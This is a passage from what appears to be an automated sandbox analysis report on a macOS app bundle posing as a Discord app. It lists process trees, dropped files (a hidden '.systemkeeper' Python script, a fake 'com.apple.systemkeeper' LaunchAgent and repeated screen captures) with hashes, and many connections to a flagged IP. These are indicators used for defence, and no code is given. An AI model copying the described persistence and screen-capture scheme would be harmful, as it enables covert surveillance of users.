      • grep (PID: 652 PPID: 650 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 653 PPID: 650 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 653 PPID: 650 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 657 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 657 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 657 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 658 PPID: 657 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 658 PPID: 657 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 659 PPID: 658 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 659 PPID: 658 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 660 PPID: 658 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 660 PPID: 658 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 661 PPID: 658 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 661 PPID: 658 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 666 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 666 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 666 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 667 PPID: 666 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 667 PPID: 666 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 668 PPID: 667 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 668 PPID: 667 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 669 PPID: 667 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 669 PPID: 667 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 670 PPID: 667 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 670 PPID: 667 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • xpcproxy (PID: 673 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • .systemkeeper (PID: 673 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4d733d44288f4357c292938f0a18a7e9)
  • Python (PID: 673 PPID: 1 Overlayed Process Image: .systemkeeper MD5: ba780ab677147d9db60c564ef3f51dd0)
    • Python (PID: 674 PPID: 673 MD5: ba780ab677147d9db60c564ef3f51dd0)
    • sh (PID: 674 PPID: 673 Overlayed Process Image: Python MD5: 8aa60b22a5d30418a002b340989384dc)
      • sh (PID: 675 PPID: 674 MD5: 8aa60b22a5d30418a002b340989384dc)
      • ps (PID: 675 PPID: 674 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
      • sh (PID: 676 PPID: 674 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 676 PPID: 674 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
      • sh (PID: 677 PPID: 674 MD5: 8aa60b22a5d30418a002b340989384dc)
      • grep (PID: 677 PPID: 674 Overlayed Process Image: sh MD5: 2b3efb273296881708ea2914c612e0eb)
  • cleanup

Created / dropped Files

/Users/henry/.system/.helper Download File
Process:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File Type:ASCII text
Size (bytes):200
Entropy (8bit):5.310703647960047
Encrypted:false
MD5:09DF808B29CFFA8DDF5200ADF05A2059
SHA1:05964912FA44696301348F7768D9BF76AF65FD5E
SHA-256:88D5E1CFDC6BF3824CB5227827BA2F790EAAAD512693DE6B72D29FDB1DB46081
SHA-512:C606F038D17115953F22AF86B9C965BD52F03BBD2560479F40DF3ADE0B3E72CF95AAC0C6D7076B1A6D76F2DC19566EC0798FF5C81609EB91D8166B1A28659ECC
Malicious:false
Reputation:low
/Users/henry/.system/.systemkeeper Download File
Process:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File Type:python script text executable
Size (bytes):1195
Entropy (8bit):5.853894166617507
Encrypted:false
MD5:4D733D44288F4357C292938F0A18A7E9
SHA1:7BC283212EE6BD822F54EA52E0B02525A904FF4D
SHA-256:31935F731329487C87B96653F6C3936CCA6CBED64F800AD24047E3BFA1434969
SHA-512:4086425D1FFD3BCBCD2C4A4A3E916F3E2EFE0BC5B5BA9B3AFF24536B0B1A1894E2118FC6406B736E7842112CB9F317FCAFBE5B581C3BE5F420C45DE03C36A27E
Malicious:false
Reputation:low
/Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist Download File
Process:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File Type:XML document text
Size (bytes):498
Entropy (8bit):4.936403071791542
Encrypted:false
MD5:82661875BA5F04E3032CECAB4FCFE450
SHA1:D9631495F1E65D9CD2A16600EAF5DBED40648FD3
SHA-256:8E29003A9C9FA5D67836D7D5F13B77ECEBB006D4498F677759C24A8076103585
SHA-512:C85B72E464D700A15F5742BC433620F6CC204B3A9EDE936CCBD690C79F6F4FB1911D44184CEFA31132F57CC1180FFB946F4A9517E64D46A1E4070ABB6E86D27F
Malicious:true
Reputation:low
/dev/null Download File
Process:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File Type:ASCII Java program text, with very long lines
Size (bytes):2113
Entropy (8bit):5.895530958706696
Encrypted:false
MD5:FA868298B4E3744A992D808BB45CC48D
SHA1:5FA8AA1A46D1CE4BCBD923E11B522BA047B95457
SHA-256:1CE247126AEBAE0B9497682C81D29B4DD5D27C710461BD6F0BDEBA97A45181EF
SHA-512:B90C63CAD3602B938EF8C59533E70D2BFA26FD6DED0BF458CF9997470651F06BA757A144092216DC5C52E22872B304BA68F80ECF85AC249635047C2C20457FB0
Malicious:false
Reputation:low
/private/tmp/.alloy.png-0JUk Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401838
Entropy (8bit):7.990957319860019
Encrypted:true
MD5:0D63766437ADA009F9AEECD38F7324E5
SHA1:894989E55C38807A19E4A019C67172513C259800
SHA-256:0F58E851DCD840AA2E4C0ED8DEE78F37D854DE2A34D4F401A0373455CECBD46C
SHA-512:AB02D6D3A22CD49ACC1CDBD4FFA31FAC21F749BB9955EA44BC65A44D0523A84ABD8A50128FA9692826C13D57E8056205930D18328D57415400EA430D128932FC
Malicious:false
Reputation:low
/private/tmp/.alloy.png-17cr Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401892
Entropy (8bit):7.9906035023153965
Encrypted:true
MD5:513F8FFEC7D1274A058D5B96D452F192
SHA1:FDC27C782EE215EB3C3781F8C49C4171FD7404EB
SHA-256:51F79BE2DF1EBE3EE7BC3BD441BCADCFC82F72DF426C2D5442DA6B3F54ED5930
SHA-512:36D79867FB6359B7BF5A87F6E02F63F80128236B0EBE1BF96C778DACAB187D7C9E63D873D8C61D4DF1E8DD130C24F6E276DABC3B9B46495818B3D86903E2B30E
Malicious:false
Reputation:low
/private/tmp/.alloy.png-3tBv Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401871
Entropy (8bit):7.9908226984392385
Encrypted:true
MD5:C2FC061E5DA54F8EAC3C513E01922EDA
SHA1:694FBB39BE3A964F54E1AFBA161D320C4657C6D8
SHA-256:3E7B36FED677D2BF505A3C8E980383EFAD8E8DD8AD76274143F98A77291E304D
SHA-512:1E694BF66703824983936DBC44E9757ACF2BD3A62E42FB52B76538D2E3C231E78C1F8517D37A7DE1F9F36167A54E39FEA506746A7C97BF95C85BC8E78B9C7176
Malicious:false
Reputation:low
/private/tmp/.alloy.png-8UHL Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401890
Entropy (8bit):7.99100176462052
Encrypted:true
MD5:0D87DC7C562AD58147D9E5A4FDD8332A
SHA1:DC166990CD0E0E7A2E1B07056D5378D6A16AC969
SHA-256:962E7ABE17B452BE779303EA79B2699E4F24D5277E6BE7190C4875F13E1E2EE0
SHA-512:4176A0DBF36C4651EE8E24E3C92E46D1BB6B5197E6F8EAF878D31932161389CC3B66AF6086CE94FEF9BA977DD490E61E49082F89B552DA2640E89DFD28130A24
Malicious:false
Reputation:low
/private/tmp/.alloy.png-9exN Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401859
Entropy (8bit):7.991134807097194
Encrypted:true
MD5:200E6CCD86DA528335807CF736864FAB
SHA1:5FCC718268A937357A48919D12833E932E714737
SHA-256:3B48CAD3BC5C58EF3E4E3363F171AE6DB544D1B2BFCBD85E57414458A97DA42E
SHA-512:98E082E134BE1BADF4378DCE57051ACBA46FB4F916690B9B80789F06AAEC7D61E489A5889E7667C507250A7586A2C21219BAE95DF6CE3C4DC5F3F2CF8F4E1331
Malicious:false
Reputation:low
/private/tmp/.alloy.png-Ciot Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401874
Entropy (8bit):7.990837966703897
Encrypted:true
MD5:6618E1D49323722714C366E1B3A2581F
SHA1:D11C4A43A36196EAFE65D26EF5DF217DEB2B8547
SHA-256:F73D4A0CFC890E97118B56A64948C85DD028D92EF349E7CE5AE144A3B6182189
SHA-512:B9E07BD325AE366D4E3D440359FF27FD599E7E2BA6236A728866C718E89C63CB352272244A8D72DA31140F69116345C305688CD7172094FCAB5E926803CC52B0
Malicious:false
Reputation:low
/private/tmp/.alloy.png-Idi5 Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401841
Entropy (8bit):7.9907897253396545
Encrypted:true
MD5:A7635596E14E4181CE475A7A79348FC7
SHA1:B53690D530B5C0535A7D50DDDEC93C5E71946285
SHA-256:648B7CE3BFEE72E78805B14B23E4070D09EC20D20E4623688BD4545B479BBD49
SHA-512:64BC11B2A0F90480E98359B2C72D9C8202B9459D2CF8DCEC29939A1B40174FDA488FC33D5F5BAE9DACB5B27C1C52776685246F4938203707A549D6B5F6FD22D2
Malicious:false
Reputation:low
/private/tmp/.alloy.png-Jwlg Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401838
Entropy (8bit):7.990957319860019
Encrypted:true
MD5:0D63766437ADA009F9AEECD38F7324E5
SHA1:894989E55C38807A19E4A019C67172513C259800
SHA-256:0F58E851DCD840AA2E4C0ED8DEE78F37D854DE2A34D4F401A0373455CECBD46C
SHA-512:AB02D6D3A22CD49ACC1CDBD4FFA31FAC21F749BB9955EA44BC65A44D0523A84ABD8A50128FA9692826C13D57E8056205930D18328D57415400EA430D128932FC
Malicious:false
Reputation:low
/private/tmp/.alloy.png-MR2Y Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401845
Entropy (8bit):7.991098486293245
Encrypted:true
MD5:3F87012EB6FF84A1C0FD2DF8E2F09B7A
SHA1:4F29D1D17CAD69ACD6BB0CEC9332A0E59D367B40
SHA-256:F147BD10079B1E7149730C38E27F6E848313FA2156FBDE69E07D556A90E66D9D
SHA-512:D3A3345109C1E63C29AB77023C6314CB57B80EEC7996521B5929203B3B70EAAF33042376C593745A2784BB573D5354D969F63B10C54CD88F0B382BA16B82A7CB
Malicious:false
Reputation:low
/private/tmp/.alloy.png-NqNk Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401868
Entropy (8bit):7.991117559100855
Encrypted:true
MD5:D1FADF22DB473B824E5A246DBBF12B3C
SHA1:3FFF8FF5C8F85BE592B60ECF024B94CE4CBE9FDB
SHA-256:2DF127DA6F7F290549E2558568CCA3DEFEE1EEFAE7C092D9C3E03BBB3DC5789D
SHA-512:5BD9EBE7863C8881D18D341265616898E72DC39948176741C8EE1C43B69445EFB9D951FEA12462D948130EC4EEF981747DA2C7F1F0C31667BE7A8A0150932D19
Malicious:false
Reputation:low
/private/tmp/.alloy.png-OKVg Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401852
Entropy (8bit):7.991076518992314
Encrypted:true
MD5:303C60C3C8A18DEC1AA99C865B170D39
SHA1:C3A13EAC418089BABE6368691615E80337D5D929
SHA-256:B4A7C16C1DC379E268B7B7226114C641A72C8FB5D850A301D86C21DC6B4C5F4F
SHA-512:CDA526E6BCD38559350CB5FFF8CD143CAB6B1A740107F900C126A274366DDF952386D44020A1B416ABFD43EF3619EFE1E406A47C4F60D69855446F03F3FE2C26
Malicious:false
Reputation:low
/private/tmp/.alloy.png-Scvr Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401845
Entropy (8bit):7.990731404741683
Encrypted:true
MD5:49284DB2D38F822431966BB478D5C55E
SHA1:D0C180425F622E268444654DD6FF7CF73B6335A5
SHA-256:264DE266C29B8ABAE5391849F4B282F70B6E6E177D81F95C4EBDD224BB87CECD
SHA-512:D1AB939EBD2E12174606BDEB34527F2EB047A38FF84C46E97681493F75D6CFDDB8FBFF946EED1C909EF73A618F538B425C175AF7FD42313F45A2322C20EC6FC3
Malicious:false
Reputation:low
/private/tmp/.alloy.png-WEFK Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401857
Entropy (8bit):7.990591595082753
Encrypted:true
MD5:C0301B7C092709E02A24EF5FBCF60A34
SHA1:ECA8C51CDFFDD9A34E90E4C68FADCCAD98A6C59F
SHA-256:64E7772B9E9EC57FDA9B86028F630A65689A1B85C219C1EB55E9375FC55F0C13
SHA-512:75BF2E119E6ACB709FCCCB5CC591945D45B87D0B0001194E5CB557A24EC525B7DBFD92E966558B23A4BB5AF4842775A7181206382FA626105A6D72810A113589
Malicious:false
Reputation:low
/private/tmp/.alloy.png-bSGC Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401580
Entropy (8bit):7.991248997254125
Encrypted:true
MD5:3F92E5CA4B9E15AA03D7E1D0023DAB63
SHA1:0C8258C65F8C38E82986C9BD8F5C2DE2E27164F1
SHA-256:B0AC977C98409B3FF86F87FF4C63D61ADC65291C0CAC1DDAF3ED061BC8FB64E4
SHA-512:D4D3F223302E0AEDF9419F3CB3424D4A3020C4F21808696A5E98F4A53D4F577848B62D74752DB0B5AFACD46F3F9DB54AE806427064231FA102AA5FA7FEDF3325
Malicious:false
Reputation:low
/private/tmp/.alloy.png-fVAs Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401799
Entropy (8bit):7.991157615425265
Encrypted:true
MD5:6AE78906DDD787CA61AFA88F37E02B66
SHA1:CA785E4579CA6E1A75B2C778685FA4C3A2A3101E
SHA-256:1A8338E3E06CC6A4FABDD1018DF1D77BBEF516AEF45A53EDD6FBFE4A37BDF070
SHA-512:45E70232DC1250647EBC1D6484D5852C3C1FB9908DAE9C8ADEA97EF4D0A71DD82D9A4696753EBDC8849C2D981FECABAADBDCA22998C499767F8D360FD9AE12A0
Malicious:false
Reputation:low
/private/tmp/.alloy.png-lIjK Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401851
Entropy (8bit):7.990560637454618
Encrypted:true
MD5:4F56FF99FC7937B7CF6EA239916B48AA
SHA1:F6E1A764A86AD75795502F648420FFD4AD0B83D9
SHA-256:03F45C7B97A6CA6C97E0E9DC78F7E19EA0F5589E0BE05083E9C3754EABA43D4D
SHA-512:0CF7F44297413BE4929A41D5DD2DBB5412865C0C016C1CC0621F1AEDDE328BE95677F2F3F68DC845C4E17376419C02AAFD7502BE96AA3D7CDBE11F71AA183ECD
Malicious:false
Reputation:low
/private/tmp/.alloy.png-trDy Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401802
Entropy (8bit):7.9912148250586625
Encrypted:true
MD5:E470958F79AC978500FC5292D11A31A4
SHA1:3297B83C697332F191C024B8FF26B89FFBDF92D7
SHA-256:31787EF7A9268E429764AFA0FCCFAE9A1314C41DE469E754386C6105E7AEB092
SHA-512:6FAB9C33CF8EAF56CE7F6D3DEC880EDA491DA5A1B510697723A915E8EE8B7390D6BDA13AA4A5B0020D2079D599BDA739A1AE61BAC58BD1502B8BF5741C64655D
Malicious:false
Reputation:low
/private/tmp/.alloy.png-whQ4 Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401851
Entropy (8bit):7.990560637454618
Encrypted:true
MD5:4F56FF99FC7937B7CF6EA239916B48AA
SHA1:F6E1A764A86AD75795502F648420FFD4AD0B83D9
SHA-256:03F45C7B97A6CA6C97E0E9DC78F7E19EA0F5589E0BE05083E9C3754EABA43D4D
SHA-512:0CF7F44297413BE4929A41D5DD2DBB5412865C0C016C1CC0621F1AEDDE328BE95677F2F3F68DC845C4E17376419C02AAFD7502BE96AA3D7CDBE11F71AA183ECD
Malicious:false
Reputation:low
/private/tmp/.alloy.png-ykTw Download File
Process:/usr/sbin/screencapture
File Type:PNG image, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Size (bytes):2401922
Entropy (8bit):7.990748472957597
Encrypted:true
MD5:765247C3F818781DD927F2816A2F5273
SHA1:BD7B9FA250F4DC0C9C5C9EB823096965642895D2
SHA-256:AAB1F384223BA269B97AC4FE6973823ACC4E7D94161982C4A00F4D1A34C73AB8
SHA-512:DBDF5B8A80BF0F83BAFDF81892BEBB6BB97CCACC82FBA3C55E2CD05B7B465FECAAB6C7E39525B4C6DF9C3E309A5C12F461E3DE6CDE9AA127DD5EEEAC4DC0FAE1
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPCountryFlagASNASN NameMalicious
37.1.221.204Ukraine
28753LEASEWEB-DEtrue
17.253.57.212United States
6185APPLE-AUSTIN-AppleIncUSfalse

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.992531528655837
TrID:
  • Mac OS X Application Bundle (12004/1) 74.99%
  • ZIP compressed archive (4004/1) 25.01%
File name:Pe7niErK6B.app
File size:1285818
MD5:1dc949fbb35b816b3046731d8db98a3d
SHA1:ffc4872e8fffd81eed1b94a6d68f1442e61c380b
SHA256:a899a7d33d9ba80b6f9500585fa108178753894dfd249c2ba64c9d6a601c516b
SHA512:05218229cd1bdf9f01794a4f2d9f17aa3b3d9ff9bc738f796edc95924ecb616580dc8e74d3dff60803cd7a52fd5cbd685ceac2ad55058397a7b22094f20e101b
SSDEEP:24576:0RgQEIOJPjMLMEi1mEM+2FJK98jurUAsl8WXlYgv5SM9+AfMbYfmQOxNlxAWNWCa:03AAMd56GEsUAL0rvJnf0Yf6hAU0V
File Content Preview:PK..........WM................DiscordApp.app/..PK........Ju.M................DiscordApp.app/Contents/..PK........Ju.M................DiscordApp.app/Icon...PK........Ju.MG1.......(..&...DiscordApp.app/Contents/document.wflow.ZY..Xv~...rF...#S.DVj...B...(u.

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Dez 12, 2018 11:24:45.320184946 MEZ492438080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:45.413317919 MEZ492448080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:46.270152092 MEZ4924580192.168.0.5037.1.221.204
Dez 12, 2018 11:24:46.356070042 MEZ492438080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:46.442203999 MEZ492448080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:47.274358988 MEZ4924580192.168.0.5037.1.221.204
Dez 12, 2018 11:24:47.358447075 MEZ492438080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:47.444545031 MEZ492448080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:48.284498930 MEZ4924580192.168.0.5037.1.221.204
Dez 12, 2018 11:24:48.369592905 MEZ492438080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:48.455698013 MEZ492448080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:49.288358927 MEZ4924580192.168.0.5037.1.221.204
Dez 12, 2018 11:24:49.374464035 MEZ492438080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:49.460568905 MEZ492448080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:50.291940928 MEZ4924580192.168.0.5037.1.221.204
Dez 12, 2018 11:24:50.377012968 MEZ492438080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:50.464056015 MEZ492448080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:51.304358959 MEZ4924580192.168.0.5037.1.221.204
Dez 12, 2018 11:24:51.759886980 MEZ4924680192.168.0.5037.1.221.204
Dez 12, 2018 11:24:52.765372992 MEZ4924680192.168.0.5037.1.221.204
Dez 12, 2018 11:24:53.798850060 MEZ4924680192.168.0.5037.1.221.204
Dez 12, 2018 11:24:53.825588942 MEZ492478080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:54.803112030 MEZ4924680192.168.0.5037.1.221.204
Dez 12, 2018 11:24:54.829210043 MEZ492478080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:55.814119101 MEZ4924680192.168.0.5037.1.221.204
Dez 12, 2018 11:24:55.841094017 MEZ492478080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:56.822160006 MEZ4924680192.168.0.5037.1.221.204
Dez 12, 2018 11:24:56.847631931 MEZ492478080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:57.860905886 MEZ492478080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:58.232245922 MEZ4924880192.168.0.5037.1.221.204
Dez 12, 2018 11:24:58.897814035 MEZ492478080192.168.0.5037.1.221.204
Dez 12, 2018 11:24:59.242876053 MEZ4924880192.168.0.5037.1.221.204
Dez 12, 2018 11:24:59.898744106 MEZ4924280192.168.0.5017.253.57.212
Dez 12, 2018 11:24:59.910720110 MEZ804924217.253.57.212192.168.0.50
Dez 12, 2018 11:24:59.912241936 MEZ4924280192.168.0.5017.253.57.212
Dez 12, 2018 11:25:00.246270895 MEZ4924880192.168.0.5037.1.221.204
Dez 12, 2018 11:25:01.250530005 MEZ4924880192.168.0.5037.1.221.204
Dez 12, 2018 11:25:02.260382891 MEZ4924880192.168.0.5037.1.221.204
Dez 12, 2018 11:25:03.283291101 MEZ4924880192.168.0.5037.1.221.204
Dez 12, 2018 11:25:04.241482019 MEZ492498080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:04.304732084 MEZ4925080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:05.255994081 MEZ492498080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:05.319487095 MEZ4925080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:06.279089928 MEZ492498080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:06.338485003 MEZ4925080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:07.287676096 MEZ492498080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:07.346993923 MEZ4925080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:08.290079117 MEZ492498080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:08.349195957 MEZ4925080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:09.290544987 MEZ492498080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:09.350609064 MEZ4925080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:10.632344961 MEZ4925180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:11.635657072 MEZ4925180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:12.647140980 MEZ4925180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:13.648269892 MEZ4925180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:14.588324070 MEZ492528080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:14.675956011 MEZ4925180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:15.600043058 MEZ492528080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:15.689266920 MEZ4925180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:16.603355885 MEZ492528080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:16.996634007 MEZ4925380192.168.0.5037.1.221.204
Dez 12, 2018 11:25:17.639904976 MEZ492528080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:18.010786057 MEZ4925380192.168.0.5037.1.221.204
Dez 12, 2018 11:25:18.640954971 MEZ492528080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:19.012072086 MEZ4925380192.168.0.5037.1.221.204
Dez 12, 2018 11:25:19.647639036 MEZ492528080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:20.026551008 MEZ4925380192.168.0.5037.1.221.204
Dez 12, 2018 11:25:21.027641058 MEZ4925380192.168.0.5037.1.221.204
Dez 12, 2018 11:25:22.038526058 MEZ4925380192.168.0.5037.1.221.204
Dez 12, 2018 11:25:23.101306915 MEZ4925480192.168.0.5037.1.221.204
Dez 12, 2018 11:25:24.102689028 MEZ4925480192.168.0.5037.1.221.204
Dez 12, 2018 11:25:25.039833069 MEZ492558080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:25.141623974 MEZ4925480192.168.0.5037.1.221.204
Dez 12, 2018 11:25:26.041676998 MEZ492558080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:26.142644882 MEZ4925480192.168.0.5037.1.221.204
Dez 12, 2018 11:25:27.055068016 MEZ492558080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:27.155167103 MEZ4925480192.168.0.5037.1.221.204
Dez 12, 2018 11:25:28.057183027 MEZ492558080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:28.157253027 MEZ4925480192.168.0.5037.1.221.204
Dez 12, 2018 11:25:29.058295012 MEZ492558080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:29.483560085 MEZ4925680192.168.0.5037.1.221.204
Dez 12, 2018 11:25:30.485013962 MEZ4925680192.168.0.5037.1.221.204
Dez 12, 2018 11:25:31.488408089 MEZ4925680192.168.0.5037.1.221.204
Dez 12, 2018 11:25:32.497617006 MEZ4925680192.168.0.5037.1.221.204
Dez 12, 2018 11:25:33.501081944 MEZ4925680192.168.0.5037.1.221.204
Dez 12, 2018 11:25:34.512950897 MEZ4925680192.168.0.5037.1.221.204
Dez 12, 2018 11:25:35.466341972 MEZ492578080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:35.834849119 MEZ4925880192.168.0.5037.1.221.204
Dez 12, 2018 11:25:36.497895956 MEZ492578080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:36.849945068 MEZ4925880192.168.0.5037.1.221.204
Dez 12, 2018 11:25:37.501382113 MEZ492578080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:37.851485968 MEZ4925880192.168.0.5037.1.221.204
Dez 12, 2018 11:25:38.509807110 MEZ492578080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:38.876913071 MEZ4925880192.168.0.5037.1.221.204
Dez 12, 2018 11:25:39.528624058 MEZ492578080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:39.880687952 MEZ4925880192.168.0.5037.1.221.204
Dez 12, 2018 11:25:40.529788971 MEZ492578080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:40.882639885 MEZ4925880192.168.0.5037.1.221.204
Dez 12, 2018 11:25:42.210678101 MEZ4925980192.168.0.5037.1.221.204
Dez 12, 2018 11:25:43.211427927 MEZ4925980192.168.0.5037.1.221.204
Dez 12, 2018 11:25:44.225004911 MEZ4925980192.168.0.5037.1.221.204
Dez 12, 2018 11:25:45.227195024 MEZ4925980192.168.0.5037.1.221.204
Dez 12, 2018 11:25:46.191934109 MEZ492608080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:46.258992910 MEZ4925980192.168.0.5037.1.221.204
Dez 12, 2018 11:25:47.196106911 MEZ492608080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:47.262999058 MEZ4925980192.168.0.5037.1.221.204
Dez 12, 2018 11:25:48.205172062 MEZ492608080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:48.554789066 MEZ4926180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:49.237901926 MEZ492608080192.168.0.5037.1.221.204
Dez 12, 2018 11:25:49.559283972 MEZ4926180192.168.0.5037.1.221.204
Dez 12, 2018 11:25:50.241672039 MEZ492608080192.168.0.5037.1.221.204
